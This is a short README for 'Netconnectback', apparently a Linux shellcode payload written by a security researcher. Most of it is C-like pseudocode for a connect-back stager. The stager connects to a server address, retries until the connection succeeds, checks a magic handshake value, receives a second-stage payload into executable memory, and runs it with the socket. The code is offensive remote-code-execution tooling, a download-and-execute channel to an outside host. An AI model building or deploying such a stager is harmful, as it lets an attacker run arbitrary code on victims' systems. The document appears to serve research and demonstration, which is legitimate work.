#
# Netconnectback Readme
# Don A. Bailey <donb@securitymouse.com>
#

This payload is a simple demonstration of a basic connect-back payload. It is
non-optimized hand written assembly that emits functionality similar to the
following C code. It is optimized for Linux and has been tested on the current
Fedora project image, compiled Jan 9 2017 (4.6.2-00042-g8493175-dirty). 

	struct sockaddr_in sin;
	sin.sin_family = AF_INET;
	sin.sin_port = SRV_PORT;
	sin.sin_addr.s_addr = SRV_ADDR;

	s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	
	r = -1;
	do
	{
		r = connect(s, &sin, sizeof sin);
		if(r < 0)
			sleep(3);
	}
	while(r < 0);

	/* Say hello */
	uint32_t x;
	recv(s, &x, 4, 0);
	if x != 0xdeadca75 {
		fail;
	}

	send(s, &x, 4, 0);

	/* Get payload length */
	recv(s, &x, 4, 0);

	m = mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);

	t = 0
	while(t < x)
	{
		r = recv(s, m + t, x - t, 0);
		if(r < 0)
			fail;
		if(r == 0)
			break;
		t += r;
	}

	int (*f)(int s);

	f = m;
	f(s);